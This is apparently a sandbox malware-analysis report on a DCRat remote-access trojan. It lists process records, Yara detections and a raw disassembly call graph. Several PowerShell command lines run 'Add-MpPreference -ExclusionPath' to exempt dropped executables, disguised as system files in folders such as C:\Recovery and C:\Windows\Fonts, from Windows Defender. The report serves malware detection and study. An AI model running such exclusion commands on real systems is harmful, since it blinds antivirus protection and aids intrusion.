                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000028.00000002.2514657098.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:41
                                Start time:04:02:12
                                Start date:26/05/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe'
                                Imagebase:0x7ff788560000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:42
                                Start time:04:02:12
                                Start date:26/05/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'
                                Imagebase:0x7ff788560000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:43
                                Start time:04:02:12
                                Start date:26/05/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                General

                                Target ID:44
                                Start time:04:02:12
                                Start date:26/05/2024
                                Path:C:\Recovery\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Recovery\explorer.exe
                                Imagebase:0x5f0000
                                File size:1'489'408 bytes
                                MD5 hash:E780BB029D808CB41937F4F7CD022B45
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000002C.00000002.2426637115.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000002C.00000002.2426637115.000000000290E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:45
                                Start time:04:02:12
                                Start date:26/05/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\addins\audiodg.exe'
                                Imagebase:0x7ff788560000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:46
                                Start time:04:02:12
                                Start date:26/05/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                General

                                Target ID:47
                                Start time:04:02:12
                                Start date:26/05/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Fonts\qiOZcVoixJLcuAFKAnRd.exe'
                                Imagebase:0x7ff788560000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:48
                                Start time:04:02:12
                                Start date:26/05/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:false

                                General

                                Target ID:49
                                Start time:04:02:12
                                Start date:26/05/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\qiOZcVoixJLcuAFKAnRd.exe'
                                Imagebase:0x7ff788560000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:9.7%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:9.3%
                                  Total number of Nodes:1480
                                  Total number of Limit Nodes:26
                                  execution_graph 24832 845780 QueryPerformanceFrequency QueryPerformanceCounter 24779 84ac0e 27 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 22960 821385 82 API calls 3 library calls 23154 83d891 19 API calls ___delayLoadHelper2@8 24780 837090 114 API calls 24781 83cc90 70 API calls 24834 83a990 97 API calls 24835 842397 48 API calls 24836 839b90 GdipCloneImage GdipAlloc 23156 83d997 23157 83d89b 23156->23157 23158 83df59 ___delayLoadHelper2@8 19 API calls 23157->23158 23158->23157 24837 849b90 21 API calls 2 library calls 24784 82ea98 FreeLibrary 24785 83a89d 78 API calls 24786 83e4a2 38 API calls 2 library calls 24787 8296a0 79 API calls 24838 84e9a0 51 API calls 24791 8216b0 84 API calls 23182 8479b7 23193 84b290 23182->23193 23187 8479d4 23189 8484de _free 20 API calls 23187->23189 23190 847a09 23189->23190 23191 8479df 23192 8484de _free 20 API calls 23191->23192 23192->23187 23194 84b299 23193->23194 23195 8479c9 23193->23195 23210 84b188 23194->23210 23197 84b610 GetEnvironmentStringsW 23195->23197 23198 84b67a 23197->23198 23199 84b627 23197->23199 23201 84b683 FreeEnvironmentStringsW 23198->23201 23202 8479ce 23198->23202 23200 84b62d WideCharToMultiByte 23199->23200 23200->23198 23203 84b649 23200->23203 23201->23202 23202->23187 23209 847a0f 26 API calls 4 library calls 23202->23209 23204 848518 __onexit 21 API calls 23203->23204 23205 84b64f 23204->23205 23206 84b656 WideCharToMultiByte 23205->23206 23207 84b66c 23205->23207 23206->23207 23208 8484de _free 20 API calls 23207->23208 23208->23198 23209->23191 23211 848fa5 _abort 38 API calls 23210->23211 23212 84b195 23211->23212 23230 84b2ae 23212->23230 23214 84b19d 23239 84af1b 23214->23239 23217 84b1b4 23217->23195 23218 848518 __onexit 21 API calls 23219 84b1c5 23218->23219 23220 84b1f7 23219->23220 23246 84b350 23219->23246 23223 8484de _free 20 API calls 23220->23223 23223->23217 23224 84b1f2 23256 84895a 20 API calls __dosmaperr 23224->23256 23226 84b23b 23226->23220 23257 84adf1 26 API calls 23226->23257 23227 84b20f 23227->23226 23228 8484de _free 20 API calls 23227->23228 23228->23226 23231 84b2ba ___FrameUnwindToState 23230->23231 23232 848fa5 _abort 38 API calls 23231->23232 23237 84b2c4 23232->23237 23234 84b348 ___FrameUnwindToState 23234->23214 23237->23234 23238 8484de _free 20 API calls 23237->23238 23258 848566 38 API calls _abort 23237->23258 23259 84a3f1 EnterCriticalSection 23237->23259 23260 84b33f LeaveCriticalSection _abort 23237->23260 23238->23237 23240 843dd6 __cftof 38 API calls 23239->23240 23241 84af2d 23240->23241 23242 84af3c GetOEMCP 23241->23242 23243 84af4e 23241->23243 23244 84af65 23242->23244 23243->23244 23245 84af53 GetACP 23243->23245 23244->23217 23244->23218 23245->23244 23247 84af1b 40 API calls 23246->23247 23250 84b36f 23247->23250 23248 84b376 23251 83ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23248->23251 23249 84b3e5 ___scrt_get_show_window_mode 23261 84aff4 GetCPInfo 23249->23261 23250->23248 23250->23249 23253 84b3c0 IsValidCodePage 23250->23253 23252 84b1ea 23251->23252 23252->23224 23252->23227 23253->23248 23254 84b3d2 GetCPInfo 23253->23254 23254->23248 23254->23249 23256->23220 23257->23220 23259->23237 23260->23237 23262 84b0d8 23261->23262 23267 84b02e 23261->23267 23265 83ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23262->23265 23266 84b184 23265->23266 23266->23248 23271 84c099 23267->23271 23270 84a275 __vswprintf_c_l 43 API calls 23270->23262 23272 843dd6 __cftof 38 API calls 23271->23272 23273 84c0b9 MultiByteToWideChar 23272->23273 23275 84c0f7 23273->23275 23276 84c18f 23273->23276 23278 848518 __onexit 21 API calls 23275->23278 23281 84c118 __vsnwprintf_l ___scrt_get_show_window_mode 23275->23281 23277 83ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23276->23277 23279 84b08f 23277->23279 23278->23281 23285 84a275 23279->23285 23280 84c189 23290 84a2c0 20 API calls _free 23280->23290 23281->23280 23283 84c15d MultiByteToWideChar 23281->23283 23283->23280 23284 84c179 GetStringTypeW 23283->23284 23284->23280 23286 843dd6 __cftof 38 API calls 23285->23286 23287 84a288 23286->23287 23291 84a058 23287->23291 23290->23276 23292 84a073 __vswprintf_c_l 23291->23292 23293 84a099 MultiByteToWideChar 23292->23293 23294 84a24d 23293->23294 23295 84a0c3 23293->23295 23296 83ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23294->23296 23298 848518 __onexit 21 API calls 23295->23298 23301 84a0e4 __vsnwprintf_l 23295->23301 23297 84a260 23296->23297 23297->23270 23298->23301 23299 84a199 23327 84a2c0 20 API calls _free 23299->23327 23300 84a12d MultiByteToWideChar 23300->23299 23302 84a146 23300->23302 23301->23299 23301->23300 23318 84a72c 23302->23318 23306 84a170 23306->23299 23308 84a72c __vswprintf_c_l 11 API calls 23306->23308 23307 84a1a8 23310 848518 __onexit 21 API calls 23307->23310 23311 84a1c9 __vsnwprintf_l 23307->23311 23308->23299 23309 84a23e 23326 84a2c0 20 API calls _free 23309->23326 23310->23311 23311->23309 23312 84a72c __vswprintf_c_l 11 API calls 23311->23312 23314 84a21d 23312->23314 23314->23309 23315 84a22c WideCharToMultiByte 23314->23315 23315->23309 23316 84a26c 23315->23316 23328 84a2c0 20 API calls _free 23316->23328 23329 84a458 23318->23329 23322 84a79c LCMapStringW 23323 84a75c 23322->23323 23324 83ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23323->23324 23325 84a15d 23324->23325 23325->23299 23325->23306 23325->23307 23326->23299 23327->23294 23328->23299 23330 84a484 23329->23330 23331 84a488 23329->23331 23330->23331 23332 84a4a8 23330->23332 23337 84a4f4 23330->23337 23331->23323 23336 84a7b4 10 API calls 3 library calls 23331->23336 23332->23331 23334 84a4b4 GetProcAddress 23332->23334 23335 84a4c4 __crt_fast_encode_pointer 23334->23335 23335->23331 23336->23322 23338 84a515 LoadLibraryExW 23337->23338 23343 84a50a 23337->23343 23339 84a532 GetLastError 23338->23339 23340 84a54a 23338->23340 23339->23340 23341 84a53d LoadLibraryExW 23339->23341 23342 84a561 FreeLibrary 23340->23342 23340->23343 23341->23340 23342->23343 23343->23330 23344 8490b0 23352 84a56f 23344->23352 23348 8490cc 23349 8490d9 23348->23349 23360 8490e0 11 API calls 23348->23360 23351 8490c4 23353 84a458 __dosmaperr 5 API calls 23352->23353 23354 84a596 23353->23354 23355 84a5ae TlsAlloc 23354->23355 23356 84a59f 23354->23356 23355->23356 23357 83ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23356->23357 23358 8490ba 23357->23358 23358->23351 23359 849029 20 API calls 3 library calls 23358->23359 23359->23348 23360->23351 23361 84a3b0 23362 84a3bb 23361->23362 23364 84a3e4 23362->23364 23365 84a3e0 23362->23365 23367 84a6ca 23362->23367 23374 84a410 DeleteCriticalSection 23364->23374 23368 84a458 __dosmaperr 5 API calls 23367->23368 23369 84a6f1 23368->23369 23370 84a70f InitializeCriticalSectionAndSpinCount 23369->23370 23371 84a6fa 23369->23371 23370->23371 23372 83ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23371->23372 23373 84a726 23372->23373 23373->23362 23374->23365 24792 841eb0 6 API calls 4 library calls 24794 8476bd 52 API calls 2 library calls 24795 83a8c2 GetDlgItem EnableWindow ShowWindow SendMessageW 24796 83eac0 27 API calls pre_c_initialization 24842 8397c0 10 API calls 24798 849ec0 21 API calls 24843 84b5c0 GetCommandLineA GetCommandLineW 24844 84ebc1 21 API calls __vswprintf_c_l 23387 83ead2 23388 83eade ___FrameUnwindToState 23387->23388 23413 83e5c7 23388->23413 23390 83eae5 23392 83eb0e 23390->23392 23493 83ef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 23390->23493 23401 83eb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23392->23401 23424 84824d 23392->23424 23396 83eb2d ___FrameUnwindToState 23397 83ebad 23432 83f020 23397->23432 23401->23397 23494 847243 38 API calls 2 library calls 23401->23494 23408 83ebd9 23410 83ebe2 23408->23410 23495 84764a 28 API calls _abort 23408->23495 23496 83e73e 13 API calls 2 library calls 23410->23496 23414 83e5d0 23413->23414 23497 83ed5b IsProcessorFeaturePresent 23414->23497 23416 83e5dc 23498 842016 23416->23498 23418 83e5e1 23419 83e5e5 23418->23419 23507 8480d7 23418->23507 23419->23390 23422 83e5fc 23422->23390 23427 848264 23424->23427 23425 83ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23426 83eb27 23425->23426 23426->23396 23428 8481f1 23426->23428 23427->23425 23429 848220 23428->23429 23430 83ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23429->23430 23431 848249 23430->23431 23431->23401 23557 83f350 23432->23557 23435 83ebb3 23436 84819e 23435->23436 23437 84b290 51 API calls 23436->23437 23440 8481a7 23437->23440 23438 83ebbc 23441 83d5d4 23438->23441 23440->23438 23559 84b59a 38 API calls 23440->23559 23560 8300cf 23441->23560 23445 83d5f3 23609 83a335 23445->23609 23447 83d5fc 23613 8313b3 GetCPInfo 23447->23613 23449 83d606 ___scrt_get_show_window_mode 23450 83d619 GetCommandLineW 23449->23450 23451 83d6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23450->23451 23452 83d628 23450->23452 23453 82400a _swprintf 51 API calls 23451->23453 23616 83bc84 23452->23616 23455 83d70d SetEnvironmentVariableW GetModuleHandleW LoadIconW 23453->23455 23627 83aded LoadBitmapW 23455->23627 23458 83d6a0 23621 83d287 23458->23621 23459 83d636 OpenFileMappingW 23461 83d696 CloseHandle 23459->23461 23462 83d64f MapViewOfFile 23459->23462 23461->23451 23465 83d660 __vswprintf_c_l 23462->23465 23466 83d68d UnmapViewOfFile 23462->23466 23470 83d287 2 API calls 23465->23470 23466->23461 23472 83d67c 23470->23472 23471 838835 8 API calls 23473 83d76a DialogBoxParamW 23471->23473 23472->23466 23474 83d7a4 23473->23474 23475 83d7b6 Sleep 23474->23475 23476 83d7bd 23474->23476 23475->23476 23479 83d7cb 23476->23479 23657 83a544 CompareStringW SetCurrentDirectoryW ___scrt_get_show_window_mode 23476->23657 23478 83d7ea DeleteObject 23480 83d806 23478->23480 23481 83d7ff DeleteObject 23478->23481 23479->23478 23482 83d837 23480->23482 23483 83d849 23480->23483 23481->23480 23658 83d2e6 6 API calls 23482->23658 23654 83a39d 23483->23654 23485 83d83d CloseHandle 23485->23483 23487 83d883 23488 84757e GetModuleHandleW 23487->23488 23489 83ebcf 23488->23489 23489->23408 23490 8476a7 23489->23490 23865 847424 23490->23865 23493->23390 23494->23397 23495->23410 23496->23396 23497->23416 23499 84201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 23498->23499 23511 84310e 23499->23511 23503 842031 23504 84203c 23503->23504 23525 84314a DeleteCriticalSection 23503->23525 23504->23418 23506 842029 23506->23418 23553 84b73a 23507->23553 23510 84203f 8 API calls 3 library calls 23510->23419 23512 843117 23511->23512 23514 843140 23512->23514 23515 842025 23512->23515 23526 843385 23512->23526 23531 84314a DeleteCriticalSection 23514->23531 23515->23506 23517 84215c 23515->23517 23546 84329a 23517->23546 23519 842166 23524 842171 23519->23524 23551 843348 6 API calls try_get_function 23519->23551 23521 84217f 23522 84218c 23521->23522 23552 84218f 6 API calls ___vcrt_FlsFree 23521->23552 23522->23503 23524->23503 23525->23506 23532 843179 23526->23532 23529 8433bc InitializeCriticalSectionAndSpinCount 23530 8433a8 23529->23530 23530->23512 23531->23515 23533 8431ad 23532->23533 23535 8431a9 23532->23535 23533->23529 23533->23530 23534 8431cd 23534->23533 23537 8431d9 GetProcAddress 23534->23537 23535->23533 23535->23534 23539 843219 23535->23539 23538 8431e9 __crt_fast_encode_pointer 23537->23538 23538->23533 23540 843236 23539->23540 23541 843241 LoadLibraryExW 23539->23541 23540->23535 23542 84325d GetLastError 23541->23542 23543 843275 23541->23543 23542->23543 23544 843268 LoadLibraryExW 23542->23544 23543->23540 23545 84328c FreeLibrary 23543->23545 23544->23543 23545->23540 23547 843179 try_get_function 5 API calls 23546->23547 23548 8432b4 23547->23548 23549 8432cc TlsAlloc 23548->23549 23550 8432bd 23548->23550 23550->23519 23551->23521 23552->23524 23556 84b753 23553->23556 23554 83ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23555 83e5ee 23554->23555 23555->23422 23555->23510 23556->23554 23558 83f033 GetStartupInfoW 23557->23558 23558->23435 23559->23440 23561 83e360 23560->23561 23562 8300d9 GetModuleHandleW 23561->23562 23563 8300f0 GetProcAddress 23562->23563 23564 830154 23562->23564 23565 830121 GetProcAddress 23563->23565 23566 830109 23563->23566 23567 830484 GetModuleFileNameW 23564->23567 23668 8470dd 42 API calls __vsnwprintf_l 23564->23668 23565->23564 23568 830133 23565->23568 23566->23565 23580 8304a3 23567->23580 23568->23564 23570 8303be 23570->23567 23571 8303c9 GetModuleFileNameW CreateFileW 23570->23571 23572 830478 CloseHandle 23571->23572 23573 8303fc SetFilePointer 23571->23573 23572->23567 23573->23572 23574 83040c ReadFile 23573->23574 23574->23572 23577 83042b 23574->23577 23577->23572 23579 830085 2 API calls 23577->23579 23578 8304d2 CompareStringW 23578->23580 23579->23577 23580->23578 23581 830508 GetFileAttributesW 23580->23581 23582 830520 23580->23582 23659 82acf5 23580->23659 23662 830085 23580->23662 23581->23580 23581->23582 23583 83052a 23582->23583 23586 830560 23582->23586 23585 830542 GetFileAttributesW 23583->23585 23587 83055a 23583->23587 23584 83066f 23608 839da4 GetCurrentDirectoryW 23584->23608 23585->23583 23585->23587 23586->23584 23588 82acf5 GetVersionExW 23586->23588 23587->23586 23589 83057a 23588->23589 23590 830581 23589->23590 23591 8305e7 23589->23591 23593 830085 2 API calls 23590->23593 23592 82400a _swprintf 51 API calls 23591->23592 23594 83060f AllocConsole 23592->23594 23595 83058b 23593->23595 23596 830667 ExitProcess 23594->23596 23597 83061c GetCurrentProcessId AttachConsole 23594->23597 23598 830085 2 API calls 23595->23598 23672 8435b3 23597->23672 23600 830595 23598->23600 23669 82ddd1 23600->23669 23602 83063d GetStdHandle WriteConsoleW Sleep FreeConsole 23602->23596 23604 82400a _swprintf 51 API calls 23605 8305c3 23604->23605 23606 82ddd1 53 API calls 23605->23606 23607 8305d2 23606->23607 23607->23596 23608->23445 23610 830085 2 API calls 23609->23610 23611 83a349 OleInitialize 23610->23611 23612 83a36c GdiplusStartup SHGetMalloc 23611->23612 23612->23447 23614 8313d7 IsDBCSLeadByte 23613->23614 23614->23614 23615 8313ef 23614->23615 23615->23449 23620 83bc8e 23616->23620 23617 83bda4 23617->23458 23617->23459 23618 83179d CharUpperW 23618->23620 23620->23617 23620->23618 23697 82ecad 80 API calls ___scrt_get_show_window_mode 23620->23697 23622 83e360 23621->23622 23623 83d294 SetEnvironmentVariableW 23622->23623 23625 83d2b7 23623->23625 23624 83d2df 23624->23451 23625->23624 23626 83d2d3 SetEnvironmentVariableW 23625->23626 23626->23624 23628 83ae15 23627->23628 23629 83ae0e 23627->23629 23630 83ae1b GetObjectW 23628->23630 23631 83ae2a 23628->23631 23703 839e1c FindResourceW 23629->23703 23630->23631 23698 839d1a 23631->23698 23635 83ae80 23646 82d31c 23635->23646 23636 83ae5c 23717 839d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23636->23717 23637 839e1c 12 API calls 23639 83ae4d 23637->23639 23639->23636 23641 83ae53 DeleteObject 23639->23641 23640 83ae64 23718 839d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23640->23718 23641->23636 23643 83ae6d 23719 839f5d 8 API calls ___scrt_get_show_window_mode 23643->23719 23645 83ae74 DeleteObject 23645->23635 23730 82d341 23646->23730 23648 82d328 23770 82da4e GetModuleHandleW FindResourceW 23648->23770 23651 838835 23856 83e24a 23651->23856 23655 83a3cc GdiplusShutdown OleUninitialize 23654->23655 23655->23487 23657->23479 23658->23485 23660 82ad09 GetVersionExW 23659->23660 23661 82ad45 23659->23661 23660->23661 23661->23580 23663 83e360 23662->23663 23664 830092 GetSystemDirectoryW 23663->23664 23665 8300aa 23664->23665 23666 8300c8 23664->23666 23667 8300bb LoadLibraryW 23665->23667 23666->23580 23667->23666 23668->23570 23674 82ddff 23669->23674 23673 8435bb 23672->23673 23673->23602 23673->23673 23680 82d28a 23674->23680 23677 82de22 LoadStringW 23678 82ddfc 23677->23678 23679 82de39 LoadStringW 23677->23679 23678->23604 23679->23678 23685 82d1c3 23680->23685 23682 82d2a7 23683 82d2bc 23682->23683 23693 82d2c8 26 API calls 23682->23693 23683->23677 23683->23678 23686 82d1de 23685->23686 23692 82d1d7 _strncpy 23685->23692 23688 82d202 23686->23688 23694 831596 WideCharToMultiByte 23686->23694 23691 82d233 23688->23691 23695 82dd6b 50 API calls __vsnprintf 23688->23695 23696 8458d9 26 API calls 3 library calls 23691->23696 23692->23682 23693->23683 23694->23688 23695->23691 23696->23692 23697->23620 23720 839d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23698->23720 23700 839d21 23701 839d2d 23700->23701 23721 839d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23700->23721 23701->23635 23701->23636 23701->23637 23704 839e70 23703->23704 23705 839e3e SizeofResource 23703->23705 23704->23628 23705->23704 23706 839e52 LoadResource 23705->23706 23706->23704 23707 839e63 LockResource 23706->23707 23707->23704 23708 839e77 GlobalAlloc 23707->23708 23708->23704 23709 839e92 GlobalLock 23708->23709 23710 839f21 GlobalFree 23709->23710 23711 839ea1 __vswprintf_c_l 23709->23711 23710->23704 23712 839f1a GlobalUnlock 23711->23712 23722 839d7b GdipAlloc 23711->23722 23712->23710 23715 839f05 23715->23712 23716 839eef GdipCreateHBITMAPFromBitmap 23716->23715 23717->23640 23718->23643 23719->23645 23720->23700 23721->23701 23723 839d8d 23722->23723 23725 839d9a 23722->23725 23726 839b0f 23723->23726 23725->23712 23725->23715 23725->23716 23727 839b30 GdipCreateBitmapFromStreamICM 23726->23727 23728 839b37 GdipCreateBitmapFromStream 23726->23728 23729 839b3c 23727->23729 23728->23729 23729->23725 23731 82d34b _wcschr __EH_prolog 23730->23731 23732 82d37a GetModuleFileNameW 23731->23732 23734 82d3ab 23731->23734 23733 82d394 23732->23733 23733->23734 23772 8299b0 23734->23772 23736 82d407 23783 845a90 26 API calls 3 library calls 23736->23783 23740 82d3db 23740->23736 23742 833781 76 API calls 23740->23742 23754 82d627 23740->23754 23741 82d41a 23784 845a90 26 API calls 3 library calls 23741->23784 23742->23740 23744 82d563 23744->23754 23809 829d30 77 API calls 23744->23809 23748 82d57d ___std_exception_copy 23749 829bf0 80 API calls 23748->23749 23748->23754 23752 82d5a6 ___std_exception_copy 23749->23752 23751 82d42c 23751->23744 23751->23754 23785 829e40 23751->23785 23800 829bf0 23751->23800 23808 829d30 77 API calls 23751->23808 23752->23754 23768 82d5b2 ___std_exception_copy 23752->23768 23810 83137a MultiByteToWideChar 23752->23810 23793 829653 23754->23793 23755 82d72b 23811 82ce72 76 API calls 23755->23811 23757 82da0a 23816 82ce72 76 API calls 23757->23816 23759 82d9fa 23759->23648 23760 82d771 23812 845a90 26 API calls 3 library calls 23760->23812 23761 833781 76 API calls 23763 82d742 23761->23763 23763->23760 23763->23761 23764 82d78b 23813 845a90 26 API calls 3 library calls 23764->23813 23766 831596 WideCharToMultiByte 23766->23768 23768->23754 23768->23755 23768->23757 23768->23759 23768->23766 23814 82dd6b 50 API calls __vsnprintf 23768->23814 23815 8458d9 26 API calls 3 library calls 23768->23815 23771 82d32f 23770->23771 23771->23651 23773 8299ba 23772->23773 23774 829a39 CreateFileW 23773->23774 23775 829aaa 23774->23775 23776 829a59 GetLastError 23774->23776 23777 829ae1 23775->23777 23779 829ac7 SetFileTime 23775->23779 23778 82b66c 2 API calls 23776->23778 23777->23740 23780 829a79 23778->23780 23779->23777 23780->23775 23781 829a7d CreateFileW GetLastError 23780->23781 23782 829aa1 23781->23782 23782->23775 23783->23741 23784->23751 23786 829e64 SetFilePointer 23785->23786 23787 829e53 23785->23787 23788 829e82 GetLastError 23786->23788 23789 829e9d 23786->23789 23787->23789 23817 826fa5 75 API calls 23787->23817 23788->23789 23791 829e8c 23788->23791 23789->23751 23791->23789 23818 826fa5 75 API calls 23791->23818 23794 829677 23793->23794 23799 829688 23793->23799 23795 829683 23794->23795 23796 82968a 23794->23796 23794->23799 23819 829817 23795->23819 23824 8296d0 23796->23824 23799->23648 23802 829c03 23800->23802 23803 829bfc 23800->23803 23802->23803 23805 829c9e 23802->23805 23807 829cc0 23802->23807 23839 82984e 23802->23839 23803->23751 23805->23803 23851 826f6b 75 API calls 23805->23851 23806 82984e 5 API calls 23806->23807 23807->23803 23807->23806 23808->23751 23809->23748 23810->23768 23811->23763 23812->23764 23813->23754 23814->23768 23815->23768 23816->23759 23817->23786 23818->23789 23820 829820 23819->23820 23821 829824 23819->23821 23820->23799 23821->23820 23830 82a12d 23821->23830 23825 8296dc 23824->23825 23826 8296fa 23824->23826 23825->23826 23828 8296e8 FindCloseChangeNotification 23825->23828 23827 829719 23826->23827 23838 826e3e 74 API calls 23826->23838 23827->23799 23828->23826 23831 83e360 23830->23831 23832 82a13a DeleteFileW 23831->23832 23833 82984c 23832->23833 23834 82a14d 23832->23834 23833->23799 23835 82b66c 2 API calls 23834->23835 23836 82a161 23835->23836 23836->23833 23837 82a165 DeleteFileW 23836->23837 23837->23833 23838->23827 23840 829867 ReadFile 23839->23840 23841 82985c GetStdHandle 23839->23841 23842 829880 23840->23842 23849 8298a0 23840->23849 23841->23840 23852 829989 23842->23852 23844 829887 23845 8298b7 23844->23845 23846 8298a8 GetLastError 23844->23846 23850 829895 23844->23850 23848 8298c7 GetLastError 23845->23848 23845->23849 23846->23845 23846->23849 23847 82984e GetFileType 23847->23849 23848->23849 23848->23850 23849->23802 23850->23847 23851->23803 23853 829992 GetFileType 23852->23853 23854 82998f 23852->23854 23855 8299a0 23853->23855 23854->23844 23855->23844 23859 83e24f ___std_exception_copy 23856->23859 23857 838854 23857->23471 23859->23857 23862 8471ad 7 API calls 2 library calls 23859->23862 23863 83ecce RaiseException Concurrency::cancel_current_task new 23859->23863 23864 83ecb1 RaiseException Concurrency::cancel_current_task 23859->23864 23862->23859 23866 847430 _abort 23865->23866 23867 847448 23866->23867 23868 84757e _abort GetModuleHandleW 23866->23868 23887 84a3f1 EnterCriticalSection 23867->23887 23870 84743c 23868->23870 23870->23867 23899 8475c2 GetModuleHandleExW 23870->23899 23871 8474ee 23888 84752e 23871->23888 23874 847450 23874->23871 23876 8474c5 23874->23876 23907 847f30 20 API calls _abort 23874->23907 23879 8474dd 23876->23879 23884 8481f1 _abort 5 API calls 23876->23884 23877 847537 23908 851a19 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 23877->23908 23878 84750b 23891 84753d 23878->23891 23880 8481f1 _abort 5 API calls 23879->23880 23880->23871 23884->23879 23887->23874 23909 84a441 LeaveCriticalSection 23888->23909 23890 847507 23890->23877 23890->23878 23910 84a836 23891->23910 23894 84756b 23897 8475c2 _abort 8 API calls 23894->23897 23895 84754b GetPEB 23895->23894 23896 84755b GetCurrentProcess TerminateProcess 23895->23896 23896->23894 23898 847573 ExitProcess 23897->23898 23900 8475ec GetProcAddress 23899->23900 23901 84760f 23899->23901 23902 847601 23900->23902 23903 847615 FreeLibrary 23901->23903 23904 84761e 23901->23904 23902->23901 23903->23904 23905 83ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23904->23905 23906 847628 23905->23906 23906->23867 23907->23876 23909->23890 23911 84a85b 23910->23911 23915 84a851 23910->23915 23912 84a458 __dosmaperr 5 API calls 23911->23912 23912->23915 23913 83ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23914 847547 23913->23914 23914->23894 23914->23895 23915->23913 24800 83acd0 100 API calls 24849 